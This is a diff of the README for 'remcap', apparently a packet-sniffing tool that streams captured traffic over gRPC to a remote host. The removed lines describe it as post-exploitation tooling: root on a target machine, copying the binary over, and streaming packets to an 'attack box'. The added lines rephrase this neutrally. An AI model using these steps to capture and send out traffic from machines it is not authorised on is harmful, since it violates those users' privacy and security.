fuskovic/remcap/README.md

     help        Help about any command

     Flags:
-        --cert      string      Path to trust cert from CA -d, --devices   strings     Network interfaces to sniff -h, --help                  Help for remcap
+        --cert      string      Path to trust certificate
+    -d, --devices   strings     Network interfaces to sniff ( comma-separated ) -h, --help                  Help for remcap
-        --host      string      <ip>:<port> of attack box to stream packets to --hours     int         Amount of hours to run capture -m, --minutes   int         Amount of minutes to run capture -s, --seconds   int         Amount of seconds to run capture
+        --host      string      <ip>:<port> of host to stream packets to --hours     int         Amount of hours to run capture -m, --minutes   int         Amount of minutes to run capture -s, --seconds   int         Amount of seconds to run capture

 ## Running client :

-`Pre-reqs` :

-- Remote into target machine and escalate to root
+`What a localhost test would look like` :

+        ./remcap -s 10 -d en0 --host localhost:4444 --cert ssl/ca.crt

+The above example would sniff the en0 interface for 10 seconds and stream any packets captured to the server running on localhost:4444.
+The cert is used for the three-way handshake to secure the connection.

+`Requirements for executing on a remote target` :

+- Root
 - `scp` the client binary ( `remcap` ) and the `ca.crt` file over

-then....
+And run the command again, passing the ip and port the gRPC server is running on

-        ./remcap -s 10 -d en0 --host ipofattackbox:portofserver --cert /path/to/ca.crt
+        ./remcap -s 10 -d en0 --host <ip>:<port> --cert /path/to/ca.crt